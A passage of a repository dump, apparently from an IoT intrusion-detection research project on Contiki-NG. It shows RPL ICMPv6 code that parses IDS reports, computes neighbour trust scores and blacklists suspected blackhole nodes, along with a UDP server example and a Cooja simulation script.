(nodes[j].address!=0){\n // nodes[j].address=0;\n // nodes[j].counterDIS=0;\n // nodes[j].counterMsg=0;\n // nodes[j].intervals=999;\n // //nodes[j].flag=0;\n // nodes[j].timestamp=0;\n // }\n // }\n }\n else\n {\n LOG_PRINT(\"NO NODES FROM DETECTOR!\\n\");\n }\n\n//}\n#endif /*ends IDS_CLIENT code*/\n }\n\n uipbuf_clear();\n}\n#endif /*IDS_CLIENT || IDS_SERVER*/\n\n/*---------------------------------------------------------------------------*/\n\n#if IDS_SERVER==1\nvoid ids_blackhole_input(void)\n{\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n\n LOG_INFO(\"received BH from client\\n\");\n\n uint16_t pos = 0;\n // uint8_t instance_id;\n // instance_id = buffer[pos++];\n \n\n if (!curr_instance.used || curr_instance.instance_id != buffer[pos++])\n {\n LOG_INFO(\"IDS IN: unknown instance, discard\\n\");\n\n goto discard;\n }\n\n uint8_t counter = (int)buffer[pos++];\n uint8_t i = 0;\n\n for (i = 0; i < counter; i++)\n {\n uint8_t ipend = buffer[pos++];\n\n uint8_t verified=buffer[pos];\n pos = pos + 3;\n // nbr->fw_packets += get16(buffer, pos);\n // pos = pos + sizeof(uint16_t);\n // nbr->flag_ids_node=1;\n\n LOG_INFO(\"bh n:%d val:%d\\n\",ipend,verified);\n\n uint32_t curr_time=clock_time();\n uint8_t flag_interval=0;\n // LOG_INFO(\"time:%d,%d\\n\",curr_time,last_time_from_ids);\n\n if (BR_last_time_from_ids+150 > curr_time ){\n flag_interval=1;\n }\n\n BR_last_time_from_ids=curr_time;\n\n //Check if node exist in blacklist or add it\n if (verified==1 || (flag_interval==0 && verified==0 && ipend!=0)){\n for (int j=0; j<NODES_NUM;j++){\n if (nodes[j].address!=0 && nodes[j].address == ipend){\n if (verified==1 && nodes[j].blackhole_mal>0)\n nodes[j].blackhole_mal=nodes[j].blackhole_mal-1;\n else if (verified==0)\n nodes[j].blackhole_mal=nodes[j].blackhole_mal+1;\n 
break;\n }\n if ((nodes[j].address==0 || j==NODES_NUM-1) && verified==0){\n nodes[j].address=ipend;\n nodes[j].intervals=999;\n nodes[j].blackhole_mal=1;\n break;\n }\n }\n \n }\n\n }\n\n goto discard;\n\n discard:\n uipbuf_clear();\n \n}\n#endif\n\n\n#if IDS_CLIENT==1 || IDS_SERVER == 1\nvoid ids_input(void)\n{\n#if IDS_SERVER == 1\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n uint8_t k = 0;\n#endif\n\n // uint16_t pos = 0;\n\n#if IDS_SERVER == 1 /*code for IDS_SERVER*/\n //The number of observed nodes\n LOG_INFO(\"GOT INPUT\\n\");\n uint16_t pos = 0;\n uint8_t detectorIP = UIP_IP_BUF->srcipaddr.u8[sizeof(UIP_IP_BUF->srcipaddr.u8) - 1];\n\n uint8_t instance_id;\n instance_id = buffer[pos++];\n\n if (!curr_instance.used || curr_instance.instance_id != instance_id)\n {\n LOG_INFO(\"IDS IN: unknown instance, discard\\n\");\n // uipbuf_clear();\n // return;\n goto discard;\n }\n\n countInNodes = get16(buffer, pos);\n pos = pos + sizeof(uint16_t);\n \n //Save IDS detector's IP to not save it in monitored nodes.\n //TODO: REMOVE\n for (k = 0; k < DETECTORS_NUM; k++)\n {\n //PRINTF(\"detector:%d\\n\",detectorsIP[k]);\n if (detectorsIP[k] == detectorIP)\n {\n break;\n }\n else if (detectorsIP[k] == 0)\n {\n detectorsIP[k] = detectorIP;\n break;\n }\n }\n\n for (k = 0; k < countInNodes; k++)\n {\n // LOG_INFO(\"inside FOR\\n\");\n //Put each received observation into a temp. list.\n ip_end = get16(buffer, pos);\n pos = pos + sizeof(uint16_t);\n uint16_t tmpdis = get16(buffer, pos);\n pos = pos + sizeof(uint16_t);\n\n uint16_t tmpdio = get16(buffer, pos);\n pos = pos + sizeof(uint16_t);\n\n uint32_t tmpinter = get32(buffer, pos);\n //memcpy(&tmpinter,buffer+ pos,4);\n pos = pos + sizeof(uint32_t);\n\n uint8_t j = 0, countflag = 0;\n char flag_detector = 0;\n uint8_t countme = 0;\n //Check if measurements is for IDS detector,then just return\n for (countme = 0; countme < DETECTORS_NUM; countme++)\n {\n if (ip_end == detectorsIP[countme])\n {\n countflag = 1;\n goto discard;\n }\n // return;\n }\n //check nodes, for python script\n LOG_INFO(\"chkns:%u %u %u %u\\n\", (unsigned)ip_end, tmpdis, tmpdio, (unsigned)tmpinter);\n\n // int8_t flagip=-1;\n //Find the node's address\n while (nodes[j].address != 0 && j < NODES_NUM)\n {\n //We avoid ids detector by dropping rpl_ids msg\n // if ((nodes[j].address==ip_end || nodes[j].address==detectorIP) && countflag==1){\n // //PRINTF(\"found:%d %u\\n\",j,(unsigned)nodes[j].address);\n // flagip=j;\n\n // j++;\n\n // }else\n\n if (nodes[j].address == ip_end && countflag == 0)\n {\n nodes[j].counterDIS = tmpdis;\n nodes[j].counterMsg = tmpdio;\n nodes[j].intervals = tmpinter;\n uint8_t c = 0;\n for (c = 0; c < DETECTORS_NUM; c++)\n {\n // LOG_INFO(\"IP:%d\",nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8)-1]);\n\n if (nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8) - 1] == UIP_IP_BUF->srcipaddr.u8[sizeof(UIP_IP_BUF->srcipaddr.u8) - 1])\n {\n nodes[j].counterDetect[c] = nodes[j].counterDetect[c] + 1;\n flag_detector = 1;\n break;\n }\n else if (nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8) - 1] == 0)\n {\n nodes[j].fromNode[c] = UIP_IP_BUF->srcipaddr;\n nodes[j].counterDetect[c] = 1;\n flag_detector = 1;\n break;\n }\n }\n break;\n }\n\n j++;\n \n \n }\n\n LOG_INFO(\"afteirneter:%d %d %d\\n\",j,nodes[j].address,NODES_NUM);\n // LOG_INFO(\"BEDNODES\\n\");\n if (j == NODES_NUM || flag_detector == 1)\n continue;\n\n if (flag_detector == 0 && nodes[j].address == 0 && countflag == 0)\n {\n nodes[j].address = ip_end;\n 
nodes[j].counterDIS = tmpdis;\n nodes[j].counterMsg = tmpdio;\n nodes[j].intervals = tmpinter;\n nodes[j].blackhole_mal=0;\n\n uint8_t c = 0;\n\n for (c = 0; c < DETECTORS_NUM; c++)\n {\n if (nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8) - 1] == 0)\n {\n nodes[j].fromNode[c] = UIP_IP_BUF->srcipaddr;\n nodes[j].counterDetect[c] = 1;\n break;\n }\n }\n // LOG_INFO(\"IPde:%d %d\",nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8)-1],nodes[j].counterDetect[c]);\n }\n // PRINTF(\"inside added:%u dis:%lu dio:%lu in:%lu\\n\",j,nodes[j].address,nodes[j].counterDIS,nodes[j].intervals);\n\n } //ends for\n\n // LOG_INFO(\"BDIS\\n\");\n goto discard;\n\n //for (k=0;k<6;k++){\n // PRINTF(\"%d add:%d dis:%d in:%d\\n\",k,nodes[k].address,nodes[k].counterDIS,nodes[k].intervals);\n\n // }\n //Finish and clear\ndiscard:\n // LOG_INFO(\"CARDIN\\n\");\n uipbuf_clear();\n\n#endif /*IDS_SERVER code*/\n}\n\n//Function to send statistics to benign nodes\n\n\n#endif /*IDS_CLIENT || IDS_SERVER*/\n\n#if MALICIOUS==0 && IDS_CLIENT==0 && IDS_SERVER == 0 && CLONE_ATTACK==0 && IDS_OF==1\n// //Function to parse input from benign\nvoid ids_input_benign(void)\n{\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n\n // LOG_INFO(\"received success from client\\n\");\n\n uint32_t curr_time=clock_time();\n uint8_t flag_interval=0;\n // LOG_INFO(\"time:%d,%d\\n\",curr_time,last_time_from_ids);\n\n if (last_time_from_ids+150 > curr_time ){\n // LOG_INFO(\"same IDSavoid\\n\");\n flag_interval=1;\n }\n\n last_time_from_ids=curr_time;\n \n\n uint16_t pos = 0;\n uint8_t instance_id;\n instance_id = buffer[pos++];\n\n if (!curr_instance.used || curr_instance.instance_id != instance_id)\n {\n LOG_INFO(\"IDS IN: unknown instance, discard\\n\");\n goto discard;\n }\n\n uint8_t counter = (int)buffer[pos++];\n uint8_t i = 0;\n rpl_nbr_t *nbr;\n\n for (i = 0; i < counter; i++)\n {\n\n uint8_t ipend = buffer[pos];\n pos = pos + sizeof(uint8_t);\n\n for (nbr = nbr_table_head(rpl_neighbors);\n nbr != NULL;\n nbr = nbr_table_next(rpl_neighbors, nbr))\n {\n // i++;\n\n uip_ipaddr_t *ip_nbr = rpl_neighbor_get_ipaddr(nbr);\n // LOG_INFO(\"bef:%d %d\\n\", ipend, ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n if (ip_nbr==NULL || ipend != ip_nbr->u8[sizeof(ip_nbr->u8) - 1])\n {\n continue;\n }\n\n const struct link_stats *stats= rpl_neighbor_get_link_stats(nbr);\n int16_t direct_trust=-1;\n \n //skip if node didn't send to nbr\n if (stats==NULL || stats->cnt_current.num_packets_tx==0)\n continue;\n\n\n //We got the correct ip from packet for this nbr\n //Below uncomment to calculate trust_value\n //buffer[pos] is verified from ids\n uint8_t verified=buffer[pos];\n pos = pos + 1;\n uint16_t fw_packets_buf=get16(buffer, pos);\n\n //Avoid updating packets 2 times when we receive from multiple IDS detectors\n if (flag_interval==1 && nbr->fw_packets >= fw_packets_buf){\n //buffer:5, nbr->fw:3\n LOG_INFO(\"NBRFW:%d >= %d actual:%d\\n\",nbr->fw_packets,fw_packets_buf,stats->cnt_current.num_packets_tx);\n\n if (verified==1){\n if (fw_packets_buf==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.05*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (fw_packets_buf>0 && nbr->fw_packets>5)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.01*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n \n }else if (verified==0){\n if (fw_packets_buf==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.5*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (fw_packets_buf>0)\n 
direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.2*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else\n direct_trust=0;\n }\n \n nbr->verified_node=verified;\n // direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.01*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n nbr->trust_value=direct_trust;\n\n if (ip_nbr!=NULL && direct_trust<26){\n if (!check_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1])){\n update_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n rpl_local_repair(\"IDS trigger\");\n // rm_bh_from_nbr_table(&ip_nbr);\n }\n }else if (ip_nbr!=NULL && direct_trust>50){//remove from list trusted node\n remove_from_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1]); \n }\n\n \n pos = pos + sizeof(uint16_t);\n break;\n \n }\n\n // LOG_INFO(\"infobef:%d buf:%d,sent:%d\\n\",nbr->fw_packets ,fw_packets_buf,stats->cnt_current.num_packets_tx);\n //transmitted less than forward, update directly\n \n //Enter only if sent more than what detected.\n if ((stats->cnt_current.num_packets_tx>nbr->fw_packets && fw_packets_buf>0) || \n (fw_packets_buf+nbr->fw_packets >= stats->cnt_current.num_packets_tx) ){\n nbr->fw_packets = stats->cnt_current.num_packets_tx;\n }else{\n nbr->fw_packets += fw_packets_buf;\n }\n\n\n pos = pos + sizeof(uint16_t);\n nbr->verified_node=verified;\n\n LOG_INFO(\"packet dropped:%d fw:%d ver:%d buf:%d sent:%d\\n\",(stats->cnt_current.num_packets_tx - nbr->fw_packets),nbr->fw_packets,verified,fw_packets_buf,stats->cnt_current.num_packets_tx);\n\n //Check if fw_packets from buffer is zero and customize penalty\n if (fw_packets_buf==0 && verified==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.5*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (fw_packets_buf>0 && verified==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.2*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (verified==1 && fw_packets_buf==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.1*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (verified==1 && fw_packets_buf>0 && nbr->fw_packets>5)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.5*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else\n direct_trust=0;\n \n LOG_INFO(\"trust:%d\\n\",direct_trust);\n nbr->trust_value=direct_trust;\n\n if (direct_trust<26){\n LOG_INFO(\"blacklst:%d\\n\",ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n \n //If node not in blacklist, add\n if (ip_nbr!=NULL && !check_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1])){\n update_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n rpl_local_repair(\"IDS trigger\");\n // rm_bh_from_nbr_table(&ip_nbr);\n // LOG_INFO(\"added to list:%d\\n\",ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n }\n\n }else if (direct_trust>50){//remove from list trusted node\n // LOG_INFO(\"recover blklist node\\n\");\n remove_from_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1]); \n }\n // if (verified==1 && direct_trust==0)\n // direct_trust=1;\n\n // if (nbr->trust_value < 50 && direct_trust == 0)\n // {\n // if (nbr->trust_value - 10 >= 0)\n // nbr->trust_value = nbr->trust_value - 10;\n // else\n // nbr->trust_value = 0;\n // }\n // else if, (nbr->trust_value > 50 && direct_trust == 0)\n // {\n // if (nbr->trust_value - 20 >= 0)\n // nbr->trust_value = nbr->trust_value - 20;\n // else\n // nbr->trust_value = 0;\n // }\n // else if (nbr->trust_value > 50 && direct_trust>= 1){\n // if (nbr->trust_value + 20 <= 100)\n // nbr->trust_value = nbr->trust_value + 20;\n // else\n // nbr->trust_value = 100;\n // }else if 
(direct_trust>=1){//trust_value<50\n // if (nbr->trust_value + 10 <= 100)\n // nbr->trust_value = nbr->trust_value + 10;\n // else\n // nbr->trust_value = 100;\n // }\n\n //buffer[pos] is verified\n\n \n // LOG_INFO(\"got:%d totfw:%d res:%d\\n\", ipend ,nbr->fw_packets,direct_trust);\n\n // nbr->fw_packets=0; //Reset after 15 minutes\n \n break;\n }\n }\n\n //Go through neighbours and save the details\n // for(nbr = nbr_table_head(rpl_neighbors);\n // nbr != NULL;\n // nbr = nbr_table_next(rpl_neighbors, nbr)) {\n // // i++;\n\n // uip_ipaddr_t * ip_nbr=rpl_neighbor_get_ipaddr(nbr);\n // // uint8_t j=0;\n\n // for(i=0;i<counter;i++){\n\n // uint8_t ipend=buffer[pos++];\n // LOG_INFO(\"bef:%d %d\\n\",ipend,ip_nbr->u8[sizeof(ip_nbr->u8)-1]);\n // if (ipend!=ip_nbr->u8[sizeof(ip_nbr->u8)-1]){\n // pos=pos+1+sizeof(uint16_t);\n // // ipend=buffer[pos++];\n // // j+=1;\n // if (i+1>=counter)\n // pos=2;\n // continue;\n // }\n\n // //We got the correct ip from packet for this nbr\n // nbr->trust_value=buffer[pos++];//get16(buffer,pos);\n\n // nbr->fw_packets=get16(buffer,pos);\n // pos = pos + sizeof(uint16_t);\n // LOG_INFO(\"RECV:%d %d tot:%d\\n\",ipend,nbr->trust_value,nbr->fw_packets);\n // pos=2; //Location of ip\n // }\n\n // LOG_INFO(\"RECV yy:%d %d\\n\",ipend,ip_nbr->u8[sizeof(ip_nbr->u8)-1]);\n //Find next ip in the packet if available\n\n // if (ipend==0 || ipend!=ip_nbr->u8[sizeof(ip_nbr->u8)-1])\n // continue;\n\n // nbr->trust_value=buffer[pos++];//get16(buffer,pos);\n\n // nbr->fw_packets=get16(buffer,pos);\n // pos = pos + sizeof(uint16_t);\n // LOG_INFO(\"RECV:%d %d tot:%d\\n\",ipend,nbr->trust_value,nbr->fw_packets);\n // pos=2; //Location of ip\n\n // }\n\n goto discard;\n\n//Discard packet\ndiscard:\n uipbuf_clear();\n}\n#endif\n\n//IDS functions\n#if IDS_CLIENT==1\nvoid ids_output_to_benign(void *ipaddr)\n{\n uip_ipaddr_t *ipaddr2=NULL;\n if (ipaddr!=NULL)\n ipaddr2=ipaddr;\n \n fw_stats *m;\n for (m = nbr_table_head(nbr_fw_stats); m != NULL;\n m = nbr_table_next(nbr_fw_stats, m))\n {\n\n linkaddr_t *lladdr = nbr_table_get_lladdr(nbr_fw_stats, m);\n \n if (&curr_instance.dag.dag_id==NULL){\n LOG_INFO(\"Error ids\\n\");\n uipbuf_clear();\n return;\n\n }else if (ipaddr2!=NULL){\n ipaddr2=&curr_instance.dag.dag_id;\n }\n\n if (ipaddr2==NULL){\n LOG_INFO(\"null here\\n\");\n uipbuf_clear();\n return;\n }\n\n ipaddr2->u8[sizeof(ipaddr2->u8) - 1] = lladdr->u8[sizeof(lladdr->u8) - 1];\n\n //Add the link-local prefix to send to neighbor\n ipaddr2->u8[0] = 254;\n ipaddr2->u8[1]= 128;\n // ipaddr->u8[2] = lladdr->u8[2];\n // ipaddr->u8[3] = lladdr->u8[3];\n\n // LOG_INFO_LLADDR(ipaddr);\n\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n uint16_t pos = 0;\n //Change instance to send to normal nodes\n buffer[pos++] = 0;\n // Get the number of nodes evaluated\n buffer[pos++] = m->index;\n // pos = pos + sizeof(char);\n\n uint8_t i = 0;\n for (i = 0; i < m->index; i++)\n {\n //Put ip, number of packets, and verified\n // buffer[pos++] = ((int)m->dest[i]) >> 8;\n // buffer[pos++] = ((int)m->dest[i]) & 0xff;\n // set16(buffer, pos, );\n // pos = pos + sizeof(char);\n buffer[pos] = m->dest[i];\n pos = pos + sizeof(uint8_t);\n buffer[pos++] = (int)m->verified[i];\n \n set16(buffer, pos, m->count_fw_packets[i]);\n pos = pos + sizeof(uint16_t);\n\n LOG_INFO(\"NOW:%d to:%d count:%d, ver:%d i:%d\\n\", lladdr->u8[sizeof(lladdr->u8) - 1], m->dest[i], m->count_fw_packets[i], m->verified[i], i);\n m->count_fw_packets[i] = 0;\n m->verified[i] = 0;\n m->dest[i]=0;\n }\n if ((int)m->index > 0)\n 
{\n LOG_INFO(\"OF:packet sent to \");\n LOG_INFO_6ADDR(ipaddr2);\n LOG_INFO_(\"\\n\");\n \n uip_icmp6_send(ipaddr2, ICMP6_RPL, RPL_CODE_IDS_NORM, 2 + (m->index) * (1 + sizeof(uint8_t) + sizeof(uint16_t)));\n\n buffer[0]=1; //ids instance\n //Send blackhole to IDS \n uip_ipaddr_t addr2;\n \n if (rpl_dag_get_root_ipaddr(&addr2)){\n addr2.u8[sizeof(addr2.u8) - 1]=1;\n // LOG_INFO(\"root:\");\n // LOG_INFO_6ADDR(&addr2);\n uip_icmp6_send(&addr2, ICMP6_RPL, RPL_CODE_IDS2, 2 + (m->index) * (1 + sizeof(uint8_t) + sizeof(uint16_t)));\n }\n \n }\n else\n LOG_INFO(\"OF:No info to send!\\n\");\n \n //Zero the index for number of nodes\n m->index=0;\n }\n\n uipbuf_clear();\n return;\n}\n#endif\n\n/** @}*/\n"
},
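The DIO/DAO builders in the record above pack every multi-byte field through set16()/set32() (and read them back with get16()/get32()) helpers defined earlier in rpl-icmp6.c, outside this excerpt. A self-contained sketch of their assumed big-endian (network byte order) semantics, using the rank value hard-coded under the MAL_RANK branch as the test input:

    /* Sketch: pack/unpack helpers matching the set16()/get16() calls above.
     * Big-endian byte order is an assumption consistent with how the
     * DIO fields are produced and consumed in the excerpt. */
    #include <stdint.h>
    #include <stdio.h>

    static void set16(unsigned char *buf, int pos, uint16_t value)
    {
      buf[pos] = value >> 8;        /* most significant byte first */
      buf[pos + 1] = value & 0xff;
    }

    static uint16_t get16(const unsigned char *buf, int pos)
    {
      return ((uint16_t)buf[pos] << 8) | buf[pos + 1];
    }

    int main(void)
    {
      unsigned char payload[2];
      set16(payload, 0, 130);       /* the rank forced by the MAL_RANK branch */
      printf("rank = %u\n", (unsigned)get16(payload, 0));  /* prints: rank = 130 */
      return 0;
    }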
{
"alpha_fraction": 0.6399257779121399,
"alphanum_fraction": 0.6531416773796082,
"avg_line_length": 29.588651657104492,
"blob_id": "be76156778e1785080a1897463e2ac0cc6197b8d",
"content_id": "2746177963065b9d851a9d4fcaaa75deaba1e818",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4313,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 141,
"path": "/examples/rpl-udp/udp-server.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "/*\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n * 3. Neither the name of the Institute nor the names of its contributors\n * may be used to endorse or promote products derived from this software\n * without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n * ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n * SUCH DAMAGE.\n *\n * This file is part of the Contiki operating system.\n *\n */\n\n#include \"contiki.h\"\n#include \"net/routing/routing.h\"\n#include \"net/netstack.h\"\n#include \"net/ipv6/simple-udp.h\"\n\n#if IDS_SERVER == 1\n#include \"ids.h\"\n#endif\n#include \"sys/log.h\"\n#define LOG_MODULE \"App\"\n#define LOG_LEVEL LOG_LEVEL_INFO\n\n#define WITH_SERVER_REPLY 1\n#define UDP_CLIENT_PORT\t8765\n#define UDP_SERVER_PORT\t5678\n\nextern void checkNodes();\nstatic struct simple_udp_connection udp_conn;\n\n#if IDS_SERVER == 1\n static struct ctimer time_to_reset;\n static void reset_stats();\n#endif\n\nPROCESS(udp_server_process, \"UDP server\");\nAUTOSTART_PROCESSES(&udp_server_process);\n/*---------------------------------------------------------------------------*/\nstatic void\nudp_rx_callback(struct simple_udp_connection *c,\n const uip_ipaddr_t *sender_addr,\n uint16_t sender_port,\n const uip_ipaddr_t *receiver_addr,\n uint16_t receiver_port,\n const uint8_t *data,\n uint16_t datalen)\n{\n LOG_INFO(\"Received request '%.*s' from \", datalen, (char *) data);\n LOG_INFO_6ADDR(sender_addr);\n LOG_INFO_(\"\\n\");\n#if WITH_SERVER_REPLY\n /* send back the same string to the client as an echo reply */\n LOG_INFO(\"Sending response.\\n\");\n simple_udp_sendto(&udp_conn, data, datalen, sender_addr);\n#endif /* WITH_SERVER_REPLY */\n}\n\n#if IDS_SERVER == 1\nstatic void reset_stats(void *ptr){\n uint8_t i=0;\n for (i=0;i<NODES_NUM;i++){\n nodes[i].address=0;\n nodes[i].counterMsg=0;\n nodes[i].counterDIS=0;\n nodes[i].intervals=999;\n nodes[i].timestamp=0;\n nodes[i].detected=0;\n nodes[i].last_avg_rss=0;\n nodes[i].spoof_suspicious=0;\n nodes[i].blackhole_mal=0;\n\n uint8_t c=0;\n for (c=0;c<DETECTORS_NUM;c++){\t\t\n nodes[i].counterDetect[c]=0;\n nodes[i].fromNode[c].u8[sizeof(nodes[i].fromNode[c].u8)-1]=0;\n\n }\n }\n\n \n ctimer_reset(&time_to_reset);\n}\n#endif\n\n\n/*---------------------------------------------------------------------------*/\nPROCESS_THREAD(udp_server_process, ev, data)\n{\n static struct etimer 
mytimer;\n\n PROCESS_BEGIN();\n\n /* Initialize DAG root */\n NETSTACK_ROUTING.root_start();\n\n /* Initialize UDP connection */\n simple_udp_register(&udp_conn, UDP_SERVER_PORT, NULL,\n UDP_CLIENT_PORT, udp_rx_callback);\n\n etimer_set(&mytimer, 20*CLOCK_SECOND);\n\n #if IDS_SERVER == 1\n //Reset after 30 min\n ctimer_set(&time_to_reset,1800*CLOCK_SECOND,reset_stats,NULL);\n #endif\n\n while(1){\n\n PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&mytimer));\n\n // PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&mytimer));\n // if (etimer_expired(&mytimer)) {\n #if IDS_SERVER==1\n checkNodes();\n #endif\n\n etimer_reset(&mytimer);\n // }\n }\n\n PROCESS_END();\n}\n/*---------------------------------------------------------------------------*/\n"
},
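The server's main loop in the record above is the standard Contiki-NG timer pattern: an etimer paces the periodic checkNodes() sweep, while a self-rearming ctimer wipes the per-node IDS statistics every 30 minutes. A minimal sketch of that pattern (callback bodies elided; compiles within a Contiki-NG project):

    #include "contiki.h"
    #include "sys/etimer.h"
    #include "sys/ctimer.h"

    PROCESS(periodic_sweep_process, "periodic sweep (sketch)");
    AUTOSTART_PROCESSES(&periodic_sweep_process);

    static struct ctimer reset_timer;

    static void reset_cb(void *ptr)
    {
      /* ... clear per-node counters here, as reset_stats() does above ... */
      ctimer_reset(&reset_timer);        /* re-arm for the next 30-min window */
    }

    PROCESS_THREAD(periodic_sweep_process, ev, data)
    {
      static struct etimer sweep;
      PROCESS_BEGIN();
      etimer_set(&sweep, 20 * CLOCK_SECOND);
      ctimer_set(&reset_timer, 1800 * CLOCK_SECOND, reset_cb, NULL);
      while(1) {
        PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&sweep));
        /* ... run the detection sweep (checkNodes() in the file above) ... */
        etimer_reset(&sweep);
      }
      PROCESS_END();
    }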
{
"alpha_fraction": 0.6532663106918335,
"alphanum_fraction": 0.6582914590835571,
"avg_line_length": 15.666666984558105,
"blob_id": "65a91f77f45db40b9b86398aeb14769830da649b",
"content_id": "3746dd802ada97697cd61523ce20017181d8555c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 199,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 12,
"path": "/os/net/routing/ids-app/of_ids.h",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#ifndef OF_IDS_H\n#define OF_IDS_H\n\n\n// #if IDS_OF==1\n// extern list_t blacklist;\n// typedef void **list_t;\n// void *blacklist_list=NULL;\n// list_t blacklist=(list_t)&blacklist_list;\n// #endif\n\n#endif"
},
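The commented-out block in of_ids.h hints at a list-backed blacklist; the functions it would serve (update_list, check_list, remove_from_list) are declared in ids.h further below, but their implementation is not part of this record. A hypothetical fixed-size-array sketch with the same signatures, keyed on the last IPv6 address byte exactly as the callers in rpl-icmp6.c use it:

    /* Hypothetical blacklist backing store; the real one is not shown in
     * this dump. Slot value 0 means "free". */
    #include <stdint.h>

    #define BLACKLIST_LEN 10
    static uint8_t blacklist[BLACKLIST_LEN];

    int check_list(uint8_t ip)
    {
      for(int i = 0; i < BLACKLIST_LEN; i++)
        if(blacklist[i] == ip) return 1;
      return 0;
    }

    void update_list(uint8_t ip)
    {
      if(check_list(ip)) return;               /* already blacklisted */
      for(int i = 0; i < BLACKLIST_LEN; i++)
        if(blacklist[i] == 0) { blacklist[i] = ip; return; }
    }

    void remove_from_list(uint8_t ip)
    {
      for(int i = 0; i < BLACKLIST_LEN; i++)
        if(blacklist[i] == ip) blacklist[i] = 0;
    }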
{
"alpha_fraction": 0.7429149746894836,
"alphanum_fraction": 0.7854251265525818,
"avg_line_length": 40.16666793823242,
"blob_id": "e0e6f331794aac93c3a6bc50eb986621240cca82",
"content_id": "34f07fdc4fd1fc68393e81c7bdbc2efeb26e7de4",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 494,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 12,
"path": "/tools/cooja/Testing/tt.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#/bin/bash\n\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS1\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS2\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS3\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS4\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS5\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS6\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS7\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS8\n#./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS9\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS10\n"
},
{
"alpha_fraction": 0.6853369474411011,
"alphanum_fraction": 0.7122039794921875,
"avg_line_length": 20.125,
